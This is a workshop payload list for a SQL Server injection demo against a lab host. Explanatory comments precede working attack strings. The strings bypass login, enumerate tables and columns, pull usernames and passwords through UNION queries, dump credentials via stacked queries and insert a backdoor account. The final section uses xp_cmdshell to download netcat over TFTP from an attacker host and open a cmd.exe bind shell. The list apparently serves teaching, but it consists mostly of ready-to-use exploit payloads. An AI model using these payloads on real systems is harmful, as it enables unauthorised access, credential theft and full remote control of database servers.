# Workshop payload list: SQL injection demo against the lab target below.
# Every non-comment line is a raw string to be submitted in the vulnerable
# input field; the leading ' closes the application's string literal and the
# trailing -- comments out the remainder of the original query.
# The @@servername / @@servicename globals, master.dbo.xp_cmdshell and the
# "having 1=1" column-leak trick are Microsoft SQL Server (T-SQL) specific;
# these payloads are not expected to work unchanged on other engines.
# NOTE(review): several payloads are destructive or persistent (select into,
# insert, file download, bind shell). Use them only on the authorised lab
# host and clean up afterwards (see the per-section notes).
IP WORKSHOP ASISTENTES: http://10.0.18.254/
#
# SQL Injection - Real Hack Exhibition
# ------------------------------------
# DEMO: Identification
# --------------------
# A lone quote unbalances the application's string literal; an injection point
# is confirmed when the response changes (a database error if the app echoes
# it, otherwise a generic failure or altered page).
'
# DEMO: Bypassing Authentication
# --------------------------------
# Assumes a login query of the shape  ... WHERE username='<in>' AND password='<in>'
# (inferred from the payloads, not visible here). "admin'--" truncates the
# password check and logs in as admin; the second form makes the predicate
# always true so the first user row is returned.
admin'--
'OR''=''--
# DEMO: Information Gathering: Table Enumeration
# ---------------------------------------------------
# HAVING without GROUP BY makes SQL Server complain that the first selected
# column is invalid; the error message names it table-qualified, which is where
# the "users.userid" used in the next section comes from. Requires the database
# error to be shown to the client.
'having 1=1--
# DEMO: Information Gathering: Column Enumeration
# ---------------------------------------------------
# Add each column named by the previous error to GROUP BY and repeat; the error
# then names the next column. When the query stops erroring the full select
# list is known — here five columns: userid, username, userpass, firstname, lastname.
'group by users.userid having 1=1--
'group by users.userid, users.username having 1=1--
'group by users.userid, users.username, users.userpass having 1=1--
'group by users.userid, users.username, users.userpass, users.firstname having 1=1--
'group by users.userid, users.username, users.userpass, users.firstname, users.lastname having 1=1--
# DEMO: Information Gathering: Data Type
# ------------------------------------------
# Error-based type probing: SUM over a character column fails with a conversion
# error, SUM over a numeric column succeeds, so the error text reveals the type.
'union select sum(firstname) from users--
'union select sum(userid) from users--
# DEMO: Information Gathering: @@version
# ---------------------------------------
# A UNION only succeeds when its column count matches the original select, so
# the number of ",1" fillers is grown until the query runs (five here, matching
# the five columns enumerated above). Once aligned, the first column carries
# the server-side value back in the page; the remaining payloads swap in other
# SQL Server globals (host name, session language, service name).
'union select @@version--
'union select @@version,1--
'union select @@version,1,1--
'union select @@version,1,1,1--
'union select @@version,1,1,1,1--
'union select @@servername,1,1,1,1--
'union select @@language,1,1,1,1--
'union select @@servicename,1,1,1,1--
# DEMO: Reading Data: Username and Password
# ------------------------------------------------------
# Row-at-a-time extraction when the page shows only one value: MIN(username)
# with a "> last value" predicate walks the usernames in sort order; the last
# two payloads pull the password of a specific user.
'union select min(username),1,1,1,1 from users where username > 'a'--
'union select min(username),1,1,1,1 from users where username > 'b'--
'union select min(userpass),1,1,1,1 from users where username = 'admin'--
'union select min(userpass),1,1,1,1 from users where username = 'support'--
# DEMO: Reading Data: Table Browsing / HTTP Proxy
# ---------------------------------------------------
# Stacked-query bulk dump: concatenate every username/userpass pair into one
# string, persist it with SELECT ... INTO into a new table "tmp", read that
# single cell back through the UNION, then drop the table.
# Caveats: SELECT INTO creates a real (not temporary) table in the current
# database, so the account needs CREATE TABLE rights and the drop is the only
# cleanup; the result is capped at varchar(8000) and silently truncated beyond
# that; the "where username>@aux" predicate is the classic concatenation
# idiom — confirm it returned every row before trusting the dump.
'declare @aux varchar(8000) set @aux='' select @aux=@aux+username+'/'+userpass+';'from users where username>@aux select @aux as aux into tmp--
'union select aux,1,1,1,1 from tmp--
'drop table tmp--
# DEMO: Altering Data: INSERT
# -----------------------------
# Positional INSERT relying on the five-column order discovered above
# (userid, username, userpass, firstname, lastname). This persists a backdoor
# account; there is no matching DELETE in this list, so remove the row
# (userid 9) manually after the demo.
'insert into users values(9,'MyUser','MyPass','MyFName','MyLName')--
# DEMO: Full Host Control: File Upload
# -----------------------------------------
# Command execution via xp_cmdshell: fetch nc.exe and whoami.exe over TFTP
# from the attacker host (172.16.1.196 must run a TFTP server), then start a
# netcat bind shell (-l listen, -d detach from console, -p port 1234,
# -t telnet negotiation, -e run cmd.exe).
# Caveats: xp_cmdshell needs sysadmin-level rights and is disabled by default
# on SQL Server 2005 and later, so this only works on a misconfigured or
# pre-enabled instance; the Windows tftp client is not installed by default on
# newer releases; the resulting shell on TCP/1234 is unauthenticated and
# reachable by anyone who can hit the host. Clean up by killing the listener
# and deleting c:\nc.exe and c:\whoami.exe.
'exec master.dbo.xp_cmdshell 'cmd /c tftp -i 172.16.1.196 get nc.exe c:\nc.exe'--
'exec master.dbo.xp_cmdshell 'cmd /c tftp -i 172.16.1.196 get whoami.exe c:\whoami.exe'--
'exec master.dbo.xp_cmdshell 'cmd /c c:\nc.exe -l -d -p 1234 -t -e cmd.exe'--